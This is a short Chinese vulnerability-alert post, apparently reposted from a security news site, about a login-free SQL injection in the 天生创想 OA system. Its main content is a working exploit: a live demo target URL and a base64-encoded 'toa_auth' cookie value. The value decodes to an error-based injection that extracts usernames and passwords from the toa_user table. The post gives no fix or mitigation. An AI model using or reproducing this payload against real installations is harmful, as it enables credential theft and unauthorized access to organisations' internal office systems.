天生创想OA系统无需登陆SQL注入下载

天生创想OA系统无需登陆SQL注入

与之前在我们黑吧安全网发布的那个漏洞不同，这个不需要登录

测试地址：http://demo1.515158.com/index.php

在cookie中添加：toa_auth

内容为：MQlkM2FmNTA5MzM1YmRlZjg3ZTcxZDBkY2M2OGNmNjNmOScsKFNlTGVjdCAxIEZST00gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoZmxvb3IocmFuZCgwKSoyKSwoc3Vic3RyaW5nKChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHgyMyxjYXN0KGNvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkLDB4M2EpIGFzIGNoYXIpLDB4MjMpIGZyb20gdG9hX3VzZXIgTElNSVQgMCwxKSksMSw2MikpKWEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IGEpYiksJzEnLCcyMTAxODU2Mjc3JyktLSAt

然后访问

http://demo1.515158.com/index.php

上一篇： [公开漏洞]迅雷水晶泄露报名用户资料(ip email 手机号等)

下一篇： [公开漏洞]重庆fupiao中心任意提款漏洞

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

天生创想OA系统无需登陆SQL注入下载

推荐文章

推荐网站